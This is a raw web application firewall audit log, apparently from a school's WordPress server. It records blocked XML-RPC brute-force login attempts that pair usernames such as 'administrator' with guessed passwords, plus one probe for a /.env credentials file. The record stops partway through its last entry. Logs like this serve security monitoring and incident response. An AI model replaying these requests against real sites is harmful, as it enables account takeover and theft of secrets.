charset=iso-8859-1 --390b7652-E-- --390b7652-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076639427344 4961 (- - -) Stopwatch2: 1745076639427344 4961; combined=3449, p1=417, p2=2870, p3=0, p4=0, p5=96, sr=86, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --390b7652-Z-- --44ec6f3f-A-- [19/Apr/2025:22:31:07 +0700] aAPBu-vDiFC_ir7MDwZF9gAAAFE 103.236.140.4 40824 103.236.140.4 8181 --44ec6f3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --44ec6f3f-C-- wp.getUsersBlogs kasubagtu 1234%^&* --44ec6f3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44ec6f3f-E-- --44ec6f3f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076667725514 5197 (- - -) Stopwatch2: 1745076667725514 5197; combined=3695, p1=443, p2=3069, p3=0, p4=0, p5=112, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44ec6f3f-Z-- --a6973743-A-- [19/Apr/2025:22:31:45 +0700] aAPB4evDiFC_ir7MDwZGowAAAEc 103.236.140.4 42930 103.236.140.4 8181 --a6973743-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a6973743-C-- wp.getUsersBlogs kasubagtu chelsea --a6973743-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6973743-E-- --a6973743-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076705729784 5029 (- - -) Stopwatch2: 1745076705729784 5029; combined=3754, p1=508, p2=3090, p3=0, p4=0, p5=92, sr=92, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6973743-Z-- --2659a348-A-- [19/Apr/2025:22:32:45 +0700] aAPCHUruoUXZj665VUFkbAAAANA 103.236.140.4 46094 103.236.140.4 8181 --2659a348-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2659a348-C-- wp.getUsersBlogs kasubagtu chicken --2659a348-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2659a348-E-- --2659a348-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076765692101 4715 (- - -) Stopwatch2: 1745076765692101 4715; combined=3233, p1=442, p2=2594, p3=0, p4=0, p5=111, sr=89, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2659a348-Z-- --e53cde50-A-- [19/Apr/2025:22:33:46 +0700] aAPCWkruoUXZj665VUFlNQAAAM4 103.236.140.4 49372 103.236.140.4 8181 --e53cde50-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e53cde50-C-- wp.getUsersBlogs kasubagtu superman --e53cde50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e53cde50-E-- --e53cde50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076826467509 4685 (- - -) Stopwatch2: 1745076826467509 4685; combined=3352, p1=355, p2=2808, p3=0, p4=0, p5=107, sr=53, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e53cde50-Z-- --feef5655-A-- [19/Apr/2025:22:34:50 +0700] aAPCmkruoUXZj665VUFmggAAAM8 103.236.140.4 52744 103.236.140.4 8181 --feef5655-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --feef5655-C-- wp.getUsersBlogs kasubagtu hellokitty --feef5655-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --feef5655-E-- --feef5655-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076890508809 5422 (- - -) Stopwatch2: 1745076890508809 5422; combined=3881, p1=541, p2=3177, p3=0, p4=0, p5=96, sr=94, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --feef5655-Z-- --c15d7161-A-- [19/Apr/2025:22:35:20 +0700] aAPCuA6cTFSgLAHl7PpDHAAAABM 103.236.140.4 54368 103.236.140.4 8181 --c15d7161-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.59.160.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Accept: */* --c15d7161-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c15d7161-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745076920902724 652 (- - -) Stopwatch2: 1745076920902724 652; combined=279, p1=238, p2=0, p3=0, p4=0, p5=41, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c15d7161-Z-- --1a73447c-A-- [19/Apr/2025:22:35:50 +0700] aAPC1kruoUXZj665VUFnRAAAANQ 103.236.140.4 55958 103.236.140.4 8181 --1a73447c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1a73447c-C-- wp.getUsersBlogs kasubagtu cooper --1a73447c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a73447c-E-- --1a73447c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076950345109 3942 (- - -) Stopwatch2: 1745076950345109 3942; combined=3071, p1=396, p2=2508, p3=0, p4=0, p5=96, sr=64, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a73447c-Z-- --e34ade40-A-- [19/Apr/2025:22:36:55 +0700] aAPDF3Na4dA2HllpK_PfcQAAAJY 103.236.140.4 59388 103.236.140.4 8181 --e34ade40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e34ade40-C-- wp.getUsersBlogs kasubagtu a801016 --e34ade40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e34ade40-E-- --e34ade40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077015678458 5419 (- - -) Stopwatch2: 1745077015678458 5419; combined=4066, p1=487, p2=3393, p3=0, p4=0, p5=111, sr=84, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e34ade40-Z-- --476bc922-A-- [19/Apr/2025:22:37:57 +0700] aAPDVQ6cTFSgLAHl7PpE2QAAABQ 103.236.140.4 34434 103.236.140.4 8181 --476bc922-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --476bc922-C-- wp.getUsersBlogs administrator administrator1 --476bc922-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --476bc922-E-- --476bc922-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077077156517 4983 (- - -) Stopwatch2: 1745077077156517 4983; combined=3766, p1=476, p2=3120, p3=0, p4=0, p5=100, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --476bc922-Z-- --fa097611-A-- [19/Apr/2025:22:38:57 +0700] aAPDkevDiFC_ir7MDwZLZQAAAEg 103.236.140.4 37686 103.236.140.4 8181 --fa097611-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fa097611-C-- wp.getUsersBlogs administrator inesslatOK_ --fa097611-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa097611-E-- --fa097611-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077137077695 5142 (- - -) Stopwatch2: 1745077137077695 5142; combined=3599, p1=458, p2=2968, p3=0, p4=0, p5=102, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa097611-Z-- --2ee9a837-A-- [19/Apr/2025:22:39:57 +0700] aAPDzQ6cTFSgLAHl7PpGegAAAAE 103.236.140.4 40870 103.236.140.4 8181 --2ee9a837-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 240 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2ee9a837-C-- wp.getUsersBlogs administrator administratorpassword --2ee9a837-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ee9a837-E-- --2ee9a837-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077197995267 4140 (- - -) Stopwatch2: 1745077197995267 4140; combined=3280, p1=369, p2=2725, p3=0, p4=0, p5=108, sr=72, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ee9a837-Z-- --6f281d66-A-- [19/Apr/2025:22:40:59 +0700] aAPEC0ruoUXZj665VUFrtAAAAM4 103.236.140.4 44238 103.236.140.4 8181 --6f281d66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6f281d66-C-- wp.getUsersBlogs administrator 1q2w3e4r5t6y --6f281d66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f281d66-E-- --6f281d66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077259579101 4671 (- - -) Stopwatch2: 1745077259579101 4671; combined=3434, p1=425, p2=2813, p3=0, p4=0, p5=112, sr=74, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f281d66-Z-- --d2cfc44b-A-- [19/Apr/2025:22:42:01 +0700] aAPESXNa4dA2HllpK_PjeQAAAJY 103.236.140.4 47566 103.236.140.4 8181 --d2cfc44b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 239 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d2cfc44b-C-- wp.getUsersBlogs administrator smkn22-jkt.sch123456 --d2cfc44b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2cfc44b-E-- --d2cfc44b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077321893282 5421 (- - -) Stopwatch2: 1745077321893282 5421; combined=3654, p1=509, p2=2988, p3=0, p4=0, p5=97, sr=89, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2cfc44b-Z-- --c33ef873-A-- [19/Apr/2025:22:43:10 +0700] aAPEjuvDiFC_ir7MDwZOvwAAAE4 103.236.140.4 51126 103.236.140.4 8181 --c33ef873-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c33ef873-C-- wp.getUsersBlogs administrator administrator1983 --c33ef873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c33ef873-E-- --c33ef873-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077390559477 5115 (- - -) Stopwatch2: 1745077390559477 5115; combined=3672, p1=421, p2=2995, p3=0, p4=0, p5=142, sr=84, sw=114, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c33ef873-Z-- --7ca46d39-A-- [19/Apr/2025:22:44:10 +0700] aAPEyuvDiFC_ir7MDwZPDgAAAEM 103.236.140.4 53054 103.236.140.4 8181 --7ca46d39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7ca46d39-C-- wp.getUsersBlogs administrator #changeme! --7ca46d39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ca46d39-E-- --7ca46d39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745077450366696 5695 (- - -) Stopwatch2: 1745077450366696 5695; combined=3897, p1=514, p2=3199, p3=0, p4=0, p5=109, sr=85, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ca46d39-Z-- --888fa613-A-- [19/Apr/2025:22:45:12 +0700] aAPFCA6cTFSgLAHl7PpKTQAAAAI 103.236.140.4 53342 103.236.140.4 8181 --888fa613-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 